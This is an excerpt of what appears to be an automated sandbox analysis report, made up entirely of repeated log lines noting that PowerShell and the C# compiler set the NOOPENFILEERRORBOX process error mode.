Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
